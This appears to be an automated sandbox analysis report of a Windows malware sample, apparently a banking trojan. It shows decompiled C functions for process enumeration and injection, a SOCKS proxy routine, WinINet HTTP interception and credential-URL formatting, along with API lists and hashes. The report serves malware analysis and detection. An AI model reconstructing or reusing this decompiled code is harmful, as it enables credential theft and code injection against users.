        0x00000000
        0x0040f08f
        0x0040ef09
        0x0040ef0c
        0x00000000
        0x00000000
        0x0040ef12
        0x0040ef15
        0x0040ef45
        0x0040ef46
        0x0040ef48
        0x00000000
        0x00000000
        0x0040ef4e
        0x0040ef5c
        0x0040ef60
        0x0040ef65
        0x0040ef67
        0x0040ef93
        0x0040ef93
        0x0040efcd
        0x0040efcd
        0x0040efd1
        0x0040efde
        0x0040efe6
        0x0040efec
        0x0040efee
        0x0040f021
        0x0040f021
        0x0040f026
        0x0040f081
        0x0040f081
        0x00000000
        0x0040f081
        0x0040f028
        0x0040f02d
        0x0040f047
        0x0040f048
        0x0040f04e
        0x0040f054
        0x0040f05a
        0x0040f05b
        0x0040f060
        0x0040f063
        0x0040f075
        0x0040f079
        0x00000000
        0x0040f07e
        0x0040eff4
        0x0040eff9
        0x0040effb
        0x00000000
        0x00000000
        0x0040effd
        0x0040f002
        0x00000000
        0x00000000
        0x0040f004
        0x0040f018
        0x0040f01d
        0x0040f01f
        0x0040f085
        0x00000000
        0x0040f085
        0x00000000
        0x0040f01f
        0x0040ef71
        0x0040ef75
        0x0040ef7a
        0x0040ef7c
        0x00000000
        0x00000000
        0x0040ef86
        0x0040ef8a
        0x0040ef8f
        0x0040ef91
        0x0040efa2
        0x0040efa6
        0x0040efab
        0x0040efad
        0x0040efc8
        0x0040efc8
        0x00000000
        0x0040efc8
        0x0040efb7
        0x0040efbb
        0x0040efc0
        0x0040efc2
        0x00000000
        0x00000000
        0x00000000
        0x0040efc2
        0x00000000
        0x0040ef91
        0x0040ef17
        0x0040ef19
        0x0040ef1b
        0x0040ef25
        0x0040ef25
        0x0040ef29
        0x00000000
        0x00000000
        0x0040ef2f
        0x0040ef33
        0x00000000
        0x00000000
        0x0040ef39
        0x00000000
        0x0040ef39
        0x0040ef1d
        0x0040ef1f
        0x00000000
        0x00000000
        0x00000000
        0x0040ef1f
        0x0040edac
        0x0040edb0
        0x00000000
        0x00000000
        0x0040edb6
        0x0040edba
        0x00000000
        0x00000000
        0x0040edc0
        0x0040edc4
        0x00000000
        0x00000000
        0x0040edca
        0x0040edce
        0x00000000
        0x0040edd4
        0x0040edd4
        0x0040eddc
        0x0040ede2
        0x0040ede2
        0x0040ede5
        0x0040ede7
        0x00000000
        0x00000000
        0x0040eded
        0x0040edf2
        0x0040edf4
        0x0040edf8
        0x0040edfa
        0x00000000
        0x00000000
        0x0040ee00
        0x0040ee04
        0x0040ee06
        0x0040ee08
        0x0040ee08
        0x0040ee21
        0x0040ee21
        0x0040ee23
        0x00000000
        0x00000000
        0x0040ee0e
        0x0040ee11
        0x0040ee13
        0x0040ee15
        0x0040ee17
        0x0040ee19
        0x0040ee1b
        0x0040ee1d
        0x0040ee1d
        0x0040ee1b
        0x0040ee17
        0x0040ee1f
        0x0040ee20
        0x0040ee20
        0x0040ee20
        0x0040ee2b
        0x0040ee31
        0x0040ee36
        0x0040ee70
        0x0040ee75
        0x0040eeaa
        0x0040eeab
        0x0040eeb5
        0x00000000
        0x0040eeb5
        0x0040ee7f
        0x0040ee81
        0x0040ee83
        0x00000000
        0x00000000
        0x0040ee88
        0x0040ee90
        0x0040ee98
        0x0040ee9d
        0x0040eea0
        0x0040eea0
        0x0040eea2
        0x0040eea5
        0x0040eea5
        0x00000000
        0x0040eea2
        0x0040ee40
        0x0040ee42
        0x0040ee44
        0x0040ee54
        0x0040ee56
        0x0040ee62
        0x0040ee66
        0x0040ee6b
        0x00000000
        0x0040ee6b
        0x0040ee4e
        0x0040ee50
        0x0040ee52
        0x00000000
        0x00000000
        0x00000000
        0x0040ee52
        0x0040edce
        0x0040ed82
        0x0040ed86
        0x00000000
        0x00000000
        0x0040ed88
        0x0040ed8c
        0x00000000
        0x00000000
        0x0040ed8e
        0x0040ed92
        0x00000000
        0x00000000
        0x0040ed94
        0x0040ed98
        0x00000000
        0x0040ed9a
        0x0040ed9a
        0x00000000
        0x0040ed9a
        0x0040ed98
        0x0040ed36
        0x0040ed3e
        0x00000000
        0x0040ed40
        0x0040ed4e
        0x00000000
        0x0040ed4e

        APIs
        • IsBadHugeWritePtr.KERNEL32(?,?), ref: 0040ED36
        • RtlEnterCriticalSection.NTDLL(urityDescriptorToAccessNamedA), ref: 0040EE2B
        • RtlLeaveCriticalSection.NTDLL(urityDescriptorToAccessNamedA), ref: 0040EEAB
        • RtlEnterCriticalSection.NTDLL(urityDescriptorToAccessNamedA), ref: 0040EEE2
        • getpeername.WS2_32(?), ref: 0040EFE6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$Enter$HugeLeaveWritegetpeername
        • String ID: %S://%S:%S@%u.%u.%u.%u:%u/$ftp$pop3$urityDescriptorToAccessNamedA
        • API String ID: 133427328-87512144
        • Opcode ID: 5e21e6b6098d9f9c1f66258109cca9bfe7fc1be98db8c0fd26430172c7f4dc84
        • Instruction ID: c45227c53a66f3d5ee494d19b5b3ef10ee3ed3861093dfebd9bc617ab7814880
        • Opcode Fuzzy Hash: 5e21e6b6098d9f9c1f66258109cca9bfe7fc1be98db8c0fd26430172c7f4dc84
        • Instruction Fuzzy Hash: 43A113306083429ADB309E26C84076BBBD16F85304F04883FF985B66D2D73DDD9AD79A
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405E39, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 85COMMON
        Download Yara Rule
        C-Code - Quality: 93%
        			E00405E39(WCHAR** __eax, WCHAR* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed int _v8;
				WCHAR* _v12;
				short _v532;
				WCHAR* _t21;
				WCHAR* _t24;
				int _t25;
				int _t40;
				void* _t43;
				signed int _t45;
				WCHAR** _t47;

				_t42 = __ecx;
				_v8 = _v8 | 0xffffffff;
				_push(L"\\??\\");
				_t43 = 4;
				_t47 = __eax;
				_t41 = __ecx;
				if(E0040F6F6(_t43, __ecx, _t43) == 0) {
					_t41 = __ecx + 8;
				}
				_t21 = PathFindFileNameW(_t41);
				_v12 = _t21;
				if(PathMatchSpecW(_t21, L"index.dat") != 0) {
					L16:
					return _v8;
				} else {
					_t45 = 0;
					while(1) {
						_t24 =  *_t47;
						if(_t24 == 0) {
							break;
						}
						_t25 = PathMatchSpecW(_v12, _t24);
						__eflags = _t25;
						if(_t25 != 0) {
							__eflags = _a4;
							if(_a4 != 0) {
								__eflags = GetModuleFileNameW(0,  &_v532, 0x103) - 0xa;
								if(__eflags > 0) {
									PathRemoveFileSpecW( &_v532);
									E004137BB(__eflags,  &_v532, L"bp_shapshot.txt");
									__eflags = _a16;
									if(__eflags != 0) {
										__eflags = 0;
										E004135EC(0, _t42, _t43,  &_v532, _a12);
									}
								}
								PathRemoveFileSpecW(_t41);
								E004137BB(__eflags, _t41, L"bk_shapshot.txt");
								__eflags = 1;
								E004135EC(1, _t42, _t43, _t41, _a12);
							} else {
								_t40 = E00405D92(_t42, _t43, _a8, _a12, _v12);
								__eflags = _t40;
								if(_t40 != 0) {
									_v8 = _t45;
								}
							}
							L15:
							goto L16;
						}
						_t47 =  &(_t47[1]);
						_t45 = _t45 + 1;
						__eflags = _t45;
					}
					goto L15;
				}
			}













        0x00405e39
        0x00405e42
        0x00405e48
        0x00405e4f
        0x00405e50
        0x00405e54
        0x00405e5d
        0x00405e5f
        0x00405e5f
        0x00405e63
        0x00405e6f
        0x00405e7a
        0x00405f2c
        0x00405f32
        0x00405e80
        0x00405e81
        0x00405e97
        0x00405e97
        0x00405e9b
        0x00000000
        0x00000000
        0x00405e89
        0x00405e8f
        0x00405e91
        0x00405ea2
        0x00405ea6
        0x00405ed3
        0x00405ed6
        0x00405edf
        0x00405ef1
        0x00405ef6
        0x00405efa
        0x00405f06
        0x00405f08
        0x00405f08
        0x00405efa
        0x00405f0e
        0x00405f1a
        0x00405f25
        0x00405f26
        0x00405ea8
        0x00405eb1
        0x00405eb6
        0x00405eb8
        0x00405eba
        0x00405eba
        0x00405eb8
        0x00405f2b
        0x00000000
        0x00405f2b
        0x00405e93
        0x00405e96
        0x00405e96
        0x00405e96
        0x00000000
        0x00405e9d

        APIs
        • PathFindFileNameW.SHLWAPI(?,\??\), ref: 00405E63
        • PathMatchSpecW.SHLWAPI(00000000,index.dat,?,\??\), ref: 00405E72
        • PathMatchSpecW.SHLWAPI(?,00000000,?,?,\??\), ref: 00405E89
        • GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,?,\??\), ref: 00405ECD
        • PathRemoveFileSpecW.SHLWAPI(?,?,?,\??\), ref: 00405EDF
          • Part of subcall function 004135EC: GetTempPathW.KERNEL32(000000F6,?,00000000,00000000), ref: 00413607
          • Part of subcall function 004135EC: GetTempFileNameW.KERNEL32(?,004040C4,00000000,?), ref: 00413629
        • PathRemoveFileSpecW.SHLWAPI(?,?,?,\??\), ref: 00405F0E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Path$File$Spec$Name$MatchRemoveTemp$FindModule
        • String ID: \??\$bk_shapshot.txt$bp_shapshot.txt$index.dat
        • API String ID: 2350928307-4187504128
        • Opcode ID: 51789b8e060509b90e71a3f1e42d5f668b5198a85870918c37ce7813a0ec4508
        • Instruction ID: d8cb0f9cd52d0d207e5563dd21c26caf7db3688926f01185b6d3b83589e29a9f
        • Opcode Fuzzy Hash: 51789b8e060509b90e71a3f1e42d5f668b5198a85870918c37ce7813a0ec4508
        • Instruction Fuzzy Hash: 8221CEB1940609ABDB10AFB1DC48AEF7AACEF54315F104477F911F21D0E67CCA808B98
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00409D7D, Relevance: 16.6, APIs: 11, Instructions: 78threadprocessstringCOMMON
        Download Yara Rule
        C-Code - Quality: 87%
        			E00409D7D() {
				void* _v8;
				char _v12;
				intOrPtr _v16;
				int _v20;
				short _v544;
				long _v572;
				void* _v580;
				void* __edi;
				intOrPtr _t20;
				void* _t25;
				void* _t26;
				intOrPtr _t28;
				void* _t30;
				void* _t36;
				void* _t38;

				_t20 =  *0x414ad4; // 0x241f5a8
				_v16 = E0040AA33(0,  *((intOrPtr*)(_t20 + 0x2c)), 4, 0, 0, 0, 0);
				_t36 = GetCurrentThread();
				_v20 = GetThreadPriority(_t36);
				SetThreadPriority(_t36, 1);
				_v12 = 3;
				do {
					_v580 = 0x22c;
					_t25 = CreateToolhelp32Snapshot(2, 0);
					_t37 =  &_v580;
					_v8 = _t25;
					Process32FirstW(_t25,  &_v580);
					while(_t25 != 0) {
						_t26 = _v572;
						__eflags = _t26;
						if(_t26 != 0) {
							__eflags = _t26 -  *0x414c94; // 0x1030
							if(__eflags != 0) {
								__eflags = _t26 - _v16;
								if(_t26 != _v16) {
									_t28 =  *0x414ad4; // 0x241f5a8
									_t30 = lstrcmpiW( &_v544,  *(_t28 + 0x50));
									__eflags = _t30;
									if(_t30 != 0) {
										_t38 = OpenProcess(0x43a, 0, _v572);
										__eflags = _t38;
										if(_t38 != 0) {
											_push(_v572);
											E00407C9A(_t37, _t38);
											CloseHandle(_t38);
										}
									}
								}
							}
						}
						_t25 = Process32NextW(_v8,  &_v580);
					}
					CloseHandle(_v8);
					_t17 =  &_v12;
					 *_t17 = _v12 - 1;
				} while ( *_t17 != 0);
				return SetThreadPriority(_t36, _v20);
			}


















        0x00409d86
        0x00409d9e
        0x00409da7
        0x00409db3
        0x00409db6
        0x00409dbc
        0x00409dc3
        0x00409dc6
        0x00409dd0
        0x00409dd6
        0x00409dde
        0x00409de1
        0x00409e53
        0x00409de9
        0x00409def
        0x00409df1
        0x00409df3
        0x00409df9
        0x00409dfb
        0x00409dfe
        0x00409e00
        0x00409e0f
        0x00409e15
        0x00409e17
        0x00409e2b
        0x00409e2d
        0x00409e2f
        0x00409e31
        0x00409e37
        0x00409e3d
        0x00409e3d
        0x00409e2f
        0x00409e17
        0x00409dfe
        0x00409df9
        0x00409e4d
        0x00409e4d
        0x00409e5a
        0x00409e60
        0x00409e60
        0x00409e60
        0x00409e77

        APIs
          • Part of subcall function 0040AA33: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040AA88
          • Part of subcall function 0040AA33: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040AAA3
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 0040AABF
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AAD8
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040AAF2
          • Part of subcall function 0040AA33: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040AB0B
          • Part of subcall function 0040AA33: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AB28
        • GetCurrentThread.KERNEL32 ref: 00409DA1
        • GetThreadPriority.KERNEL32(00000000), ref: 00409DAA
        • SetThreadPriority.KERNEL32(00000000,00000001), ref: 00409DB6
        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409DD0
        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00409DE1
        • lstrcmpiW.KERNEL32(?,?), ref: 00409E0F
        • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 00409E25
        • CloseHandle.KERNEL32(00000000), ref: 00409E3D
        • Process32NextW.KERNEL32(?,0000022C), ref: 00409E4D
        • CloseHandle.KERNEL32(?), ref: 00409E5A
        • SetThreadPriority.KERNEL32(00000000,?), ref: 00409E6D
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Thread$HandlePriorityWrite$CloseCreateProcess32Read$CurrentFirstNamedNextOpenPipeProcessSnapshotStateToolhelp32lstrcmpi
        • String ID:
        • API String ID: 2830737922-0
        • Opcode ID: b6a40fda316bec3538b3d7b0ad590c3397781c1bc69565e118533a4e6149f625
        • Instruction ID: 4697aaebaa590e1308d55a66fccee1dcd345b5829465a605fac2d6f368f090ab
        • Opcode Fuzzy Hash: b6a40fda316bec3538b3d7b0ad590c3397781c1bc69565e118533a4e6149f625
        • Instruction Fuzzy Hash: CF213B71A00214ABDF20ABA1ED4CADEBF78FF44751F0080B5F109A61A1D7B49E50CBA8
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040997D, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149memorystringsynchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 72%
        			E0040997D(void* __esi, intOrPtr _a4, char _a7, long _a8, char _a12) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				char _v20;
				short _v22;
				char _v24;
				void* __edi;
				signed short _t40;
				signed int _t42;
				long _t45;
				long _t46;
				char _t49;
				char _t51;
				long _t52;
				long _t53;
				long _t58;
				long _t61;
				long _t66;
				long _t68;
				void* _t70;
				intOrPtr _t72;
				void* _t74;
				long _t76;
				void* _t77;
				intOrPtr* _t80;
				void* _t81;
				void* _t85;
				long _t86;

				_t81 = __esi;
				_push("socks");
				_push(_a4);
				if( *0x414dc8() != 0) {
					_t40 = E0040F3F1(_a4, _t74);
					_t3 = _t40 - 1; // -1
					__eflags = _t3 - 0xfffd;
					if(_t3 > 0xfffd) {
						L5:
						return 0;
					}
					_t42 = _t40 & 0x0000ffff;
					L4:
					if(_t42 != 0) {
						_v8 = _v8 & 0x00000000;
						asm("rol ax, 0x8");
						_v16 = _t42 & 0x0000ffff;
						_t45 =  *0x414ce0(_a8, _a12, 0,  &_a8);
						__eflags = _t45;
						if(_t45 != 0) {
							goto L5;
						}
						_t46 = _a8;
						while(1) {
							__eflags = _t46;
							if(_t46 == 0) {
								break;
							}
							__eflags =  *((intOrPtr*)(_t46 + 4)) - 2;
							if( *((intOrPtr*)(_t46 + 4)) == 2) {
								_t72 =  *((intOrPtr*)(_t46 + 0x10));
								_v8 = E0040F1B1( *((intOrPtr*)(_t46 + 0x18)), _t72);
								L12:
								 *0x414ce4(_a8, _t77);
								_t78 = _v8;
								__eflags = _v8;
								if(_v8 != 0) {
									_a7 = 0;
									_t49 = E00410692(_t78, _t72);
									_a12 = _t49;
									__eflags = _t49 - 0xffffffff;
									if(_t49 == 0xffffffff) {
										L35:
										E0040F15E(_v8);
										_t51 = _a7;
										L36:
										return _t51;
									}
									_t76 =  *0x414d10; // 0x6c646e61
									__eflags = _t76;
									if(_t76 == 0) {
										_t52 = 0;
										__eflags = 0;
									} else {
										_t52 = E0040F637(_t76);
									}
									_push(_t81);
									_t53 = E00409755(_t76, _t52, __eflags, _a12, 1, _t76);
									__eflags = _t53;
									if(_t53 == 0) {
										L34:
										E00410970(_a12);
										goto L35;
									} else {
										_a7 = 1;
										while(1) {
											_t85 = E00410888(0,  &_a12, 0x3e8, 0);
											__eflags = _t85 - 0xffffffff;
											if(_t85 != 0xffffffff) {
												goto L23;
											}
											L22:
											_t70 =  *0x414d04();
											__eflags = _t70 - 0x274c;
											if(_t70 != 0x274c) {
												goto L34;
											}
											L23:
											_t58 = WaitForSingleObject( *0x414a30, 0);
											__eflags = _t58;
											if(_t58 == 0) {
												goto L34;
											}
											L24:
											__eflags = _t85 - 0xffffffff;
											if(_t85 == 0xffffffff) {
												do {
													_t85 = E00410888(0,  &_a12, 0x3e8, 0);
													__eflags = _t85 - 0xffffffff;
													if(_t85 != 0xffffffff) {
														goto L23;
													}
													goto L22;
												} while (_t85 == 0xffffffff);
											}
											_t61 = E00409660( &_v24, _t76, _a12,  &_v12);
											__eflags = _t61;
											if(_t61 == 0) {
												goto L34;
											}
											__eflags = _v20 - 2;
											_t80 = _v12;
											if(_v20 != 2) {
												L33:
												E0040F15E(_t80);
												continue;
											}
											__eflags = _v22 - 4;
											if(_v22 != 4) {
												goto L33;
											}
											_t86 = RtlAllocateHeap( *0x415fa8, 8, 0x14);
											__eflags = _t86;
											if(_t86 == 0) {
												goto L33;
											}
											 *((short*)(_t86 + 8)) = _v16;
											 *((intOrPtr*)(_t86 + 4)) = _t72;
											 *((intOrPtr*)(_t86 + 0xc)) =  *_t80;
											_t66 = E0040F1B1(_v8, _t72);
											 *_t86 = _t66;
											__eflags = _t66;
											if(_t66 == 0) {
												L32:
												E0040F15E(_t86);
												goto L33;
											}
											 *0x414a2c =  *0x414a2c + 1;
											_t68 = E0040B81A(_t76, E004098EC, _t86);
											__eflags = _t68;
											if(_t68 > 0) {
												goto L33;
											}
											 *0x414a2c =  *0x414a2c - 1;
											__eflags =  *0x414a2c;
											E0040F15E( *_t86);
											goto L32;
										}
									}
								}
								_t51 = 0;
								goto L36;
							}
							_t46 =  *(_t46 + 0x1c);
						}
						_t72 = _a4;
						goto L12;
					}
					goto L5;
				}
				_t42 =  *0x414a38 & 0x0000ffff;
				goto L4;
			}































        0x0040997d
        0x00409983
        0x00409988
        0x00409993
        0x004099a1
        0x004099a6
        0x004099a9
        0x004099af
        0x004099b9
        0x00000000
        0x004099b9
        0x004099b1
        0x004099b4
        0x004099b7
        0x004099c0
        0x004099c4
        0x004099cb
        0x004099da
        0x004099e0
        0x004099e2
        0x00000000
        0x00000000
        0x004099e4
        0x004099f3
        0x004099f3
        0x004099f5
        0x00000000
        0x00000000
        0x004099ea
        0x004099ee
        0x00409a12
        0x00409a1e
        0x004099fa
        0x004099fe
        0x00409a04
        0x00409a07
        0x00409a09
        0x00409a24
        0x00409a28
        0x00409a2d
        0x00409a30
        0x00409a33
        0x00409b3f
        0x00409b42
        0x00409b47
        0x00409b4a
        0x00000000
        0x00409b4b
        0x00409a39
        0x00409a3f
        0x00409a41
        0x00409a4a
        0x00409a4a
        0x00409a43
        0x00409a43
        0x00409a43
        0x00409a4c
        0x00409a55
        0x00409a5a
        0x00409a5c
        0x00409b36
        0x00409b39
        0x00000000
        0x00409a62
        0x00409a62
        0x00409a66
        0x00409a78
        0x00409a7a
        0x00409a7d
        0x00000000
        0x00000000
        0x00409a7f
        0x00409a7f
        0x00409a85
        0x00409a8a
        0x00000000
        0x00000000
        0x00409a90
        0x00409a98
        0x00409a9e
        0x00409aa0
        0x00000000
        0x00000000
        0x00409aa6
        0x00409aa6
        0x00409aa9
        0x00409a66
        0x00409a78
        0x00409a7a
        0x00409a7d
        0x00000000
        0x00000000
        0x00000000
        0x00409a7d
        0x00409a66
        0x00409ab5
        0x00409aba
        0x00409abc
        0x00000000
        0x00000000
        0x00409abe
        0x00409ac2
        0x00409ac5
        0x00409b2b
        0x00409b2c
        0x00000000
        0x00409b2c
        0x00409ac7
        0x00409acc
        0x00000000
        0x00000000
        0x00409ade
        0x00409ae0
        0x00409ae2
        0x00000000
        0x00000000
        0x00409aec
        0x00409af0
        0x00409af5
        0x00409af8
        0x00409afd
        0x00409aff
        0x00409b01
        0x00409b25
        0x00409b26
        0x00000000
        0x00409b26
        0x00409b03
        0x00409b0f
        0x00409b14
        0x00409b16
        0x00000000
        0x00000000
        0x00409b18
        0x00409b18
        0x00409b20
        0x00000000
        0x00409b20
        0x00409a66
        0x00409a5c
        0x00409a0b
        0x00000000
        0x00409a0b
        0x004099f0
        0x004099f0
        0x004099f7
        0x00000000
        0x004099f7
        0x00000000
        0x004099b7
        0x00409995
        0x00000000

        APIs
        • lstrcmpi.KERNEL32(?,socks), ref: 0040998B
        • getaddrinfo.WS2_32(?,?,00000000,?), ref: 004099DA
        • FreeAddrInfoW.WS2_32(?), ref: 004099FE
        • WSAGetLastError.WS2_32(00000002,000003E8,00000000,?,?,?,?,?,?), ref: 00409A7F
        • WaitForSingleObject.KERNEL32(00000000,?,000003E8,00000000,?,?,?,?,?), ref: 00409A98
        • RtlAllocateHeap.NTDLL(00000008,00000014), ref: 00409AD8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddrAllocateErrorFreeHeapInfoLastObjectSingleWaitgetaddrinfolstrcmpi
        • String ID: andle$atorA$socks
        • API String ID: 972253065-3881547300
        • Opcode ID: fb3b4f64b4ac218035f382c1a4b9332715a65c3c4ba19518c2e5a9eb08be6af0
        • Instruction ID: e2f13ce5751d9ab031013644765e95df92a03ca329c5415e73f87ea71180ab3d
        • Opcode Fuzzy Hash: fb3b4f64b4ac218035f382c1a4b9332715a65c3c4ba19518c2e5a9eb08be6af0
        • Instruction Fuzzy Hash: 8E519D71600205EBCF20AF61DC45AAE7BB4FF01764F10843AF955BB2E2E7389E459B58
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040E887, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 138networkCOMMON
        Download Yara Rule
        C-Code - Quality: 67%
        			E0040E887(void* __eax, void* __ecx, signed int __edx, void* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				void* __edi;
				void* __esi;
				signed int _t31;
				long _t32;
				DWORD* _t36;
				void _t38;
				signed int _t40;
				signed int _t43;
				signed int _t44;
				intOrPtr _t45;
				signed int _t47;
				signed int _t55;
				DWORD* _t58;
				signed int _t64;
				void* _t67;
				void* _t72;

				_t64 = __edx;
				_t61 = __ecx;
				_push(__ecx);
				_t67 = __eax;
				_t58 = __eax + 0x400;
				 *_t58 = 0x3fc;
				if(InternetQueryOptionA(_a4, 0x22, __eax, _t58) == 0) {
					L21:
					_t31 = 0;
					__eflags = 0;
					L22:
					return _t31;
				}
				_t32 =  *_t58;
				if(_t32 <= 8) {
					goto L21;
				}
				 *((char*)(_t32 + _t67)) = 0;
				 *0x414ed8(0x414f68);
				E0040D472(_t67,  *_t58);
				 *0x414edc(0x414f68);
				_t36 = _t67 + 0x410;
				_t72 = _t67 + 0x404;
				 *_t36 = 9;
				if(HttpQueryInfoA(_a4, 0x2d, _t72, _t36, 0) == 0) {
					goto L21;
				}
				_t38 =  *_t72;
				if(_t38 == 0x47) {
					L5:
					if(E00408849(_t61, _t80, "809dslffsdfsdfgg", _t67, 1) == 0) {
						_t40 = E00404196(_t61);
						__eflags = _t40;
						_v8 = _t40;
						 *((char*)(_t67 + 0x414)) = _t40 & 0xffffff00 | _t40 != 0x00000000;
						 *(_t67 + 0x420) = _a4;
						_t43 = _a12;
						 *((intOrPtr*)(_t67 + 0x42c)) = 0;
						 *((intOrPtr*)(_t67 + 0x428)) = 0;
						__eflags = _t43;
						if(_t43 == 0) {
							L11:
							 *(_t67 + 0x41c) = 0;
							 *(_t67 + 0x418) = 0;
							L12:
							_t44 = E0040BAF5(_t64, _t67, _v8);
							__eflags = _t44;
							if(_t44 == 0) {
								goto L6;
							}
							_t45 =  *0x414ad4; // 0x241f5a8
							_t63 =  *((intOrPtr*)(_t45 + 0x14c));
							_t65 = E0040F637( *((intOrPtr*)(_t45 + 0x14c)));
							_t47 = E0040A3D4( *((intOrPtr*)(_t45 + 0x14c)), _t46, _t67,  *_t58, 0, 0, 0);
							__eflags = _t47;
							if(_t47 != 0) {
								_t55 = E0040F346( *_t58, _t67);
								__eflags = _t55;
								if(_t55 != 0) {
									E0040B81A(_t63, E0040C849, _t55);
								}
							}
							__eflags =  *((char*)(_t67 + 0x414));
							if(__eflags != 0) {
								 *0x414ed8(0x414f68);
								_t60 = _v8;
								__eflags = E0040D2F0(_t65, _t67, __eflags, _v8, 0x4e28, 8, 0xa, E0040E503);
								if(__eflags == 0) {
									E0040D2F0(_t65, _t67, __eflags, _t60, 0x4e29, 6, 8, E0040D772);
									E0040D574(_t65, _t60, _t67);
								} else {
									 *(_t67 + 0x424) =  *(_t67 + 0x424) | 0x00000002;
								}
								 *0x414edc(0x414f68);
								E0040F15E(_t60);
							}
							L7:
							_t31 = 1;
							goto L22;
						}
						_t64 = _a8;
						__eflags = _t64;
						if(_t64 == 0) {
							goto L11;
						} else {
							 *(_t67 + 0x41c) = _t43;
							 *(_t67 + 0x418) = _t64;
							goto L12;
						}
					}
					L6:
					 *(_t67 + 0x424) =  *(_t67 + 0x424) | 0x00000004;
					SetLastError(0x2f78);
					goto L7;
				}
				_t80 = _t38 - 0x50;
				if(_t38 != 0x50) {
					goto L21;
				}
				goto L5;
			}




















        0x0040e887
        0x0040e887
        0x0040e88a
        0x0040e88e
        0x0040e890
        0x0040e89d
        0x0040e8ab
        0x0040ea40
        0x0040ea40
        0x0040ea40
        0x0040ea42
        0x0040ea46
        0x0040ea46
        0x0040e8b1
        0x0040e8b6
        0x00000000
        0x00000000
        0x0040e8c2
        0x0040e8c6
        0x0040e8cf
        0x0040e8d5
        0x0040e8dd
        0x0040e8e4
        0x0040e8f0
        0x0040e8fe
        0x00000000
        0x00000000
        0x0040e904
        0x0040e908
        0x0040e912
        0x0040e921
        0x0040e93c
        0x0040e943
        0x0040e945
        0x0040e94b
        0x0040e954
        0x0040e95a
        0x0040e95d
        0x0040e963
        0x0040e969
        0x0040e96b
        0x0040e982
        0x0040e982
        0x0040e988
        0x0040e98e
        0x0040e993
        0x0040e998
        0x0040e99a
        0x00000000
        0x00000000
        0x0040e99c
        0x0040e9a1
        0x0040e9b4
        0x0040e9b6
        0x0040e9bb
        0x0040e9bd
        0x0040e9c2
        0x0040e9c7
        0x0040e9c9
        0x0040e9d1
        0x0040e9d1
        0x0040e9c9
        0x0040e9d6
        0x0040e9dd
        0x0040e9e9
        0x0040e9ef
        0x0040ea06
        0x0040ea08
        0x0040ea22
        0x0040ea29
        0x0040ea0a
        0x0040ea0a
        0x0040ea0a
        0x0040ea2f
        0x0040ea36
        0x0040ea36
        0x0040e935
        0x0040e935
        0x00000000
        0x0040e935
        0x0040e96d
        0x0040e970
        0x0040e972
        0x00000000
        0x0040e974
        0x0040e974
        0x0040e97a
        0x00000000
        0x0040e97a
        0x0040e972
        0x0040e923
        0x0040e923
        0x0040e92f
        0x00000000
        0x0040e92f
        0x0040e90a
        0x0040e90c
        0x00000000
        0x00000000
        0x00000000

        APIs
        • InternetQueryOptionA.WININET(?,00000022,?,?), ref: 0040E8A3
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E8C6
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E8D5
        • HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0040E8F6
        • SetLastError.KERNEL32(00002F78), ref: 0040E92F
          • Part of subcall function 00404196: CreateMutexW.KERNEL32(004155B4,00000000,?), ref: 004041B1
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E9E9
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040EA2F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeaveQuery$CreateErrorHttpInfoInternetLastMutexOption
        • String ID: 809dslffsdfsdfgg$essAsUserA
        • API String ID: 4246016607-4269529348
        • Opcode ID: 6441aaddbb206ca703e41a38bb3d7d81ee4d57befe1b7e0a4c4f591c9cee15e1
        • Instruction ID: 9428ca7a0f9ea51ad5fc9d9fb7fc5f80a0a524135bf182b993fa5b074a75bae1
        • Opcode Fuzzy Hash: 6441aaddbb206ca703e41a38bb3d7d81ee4d57befe1b7e0a4c4f591c9cee15e1
        • Instruction Fuzzy Hash: 2C41D5B1700201BAC7249F628C85FDB7B68BF89744F04843AF604B62D2C7789965DBAD
        Uniqueness

        Uniqueness Score: -1.00%

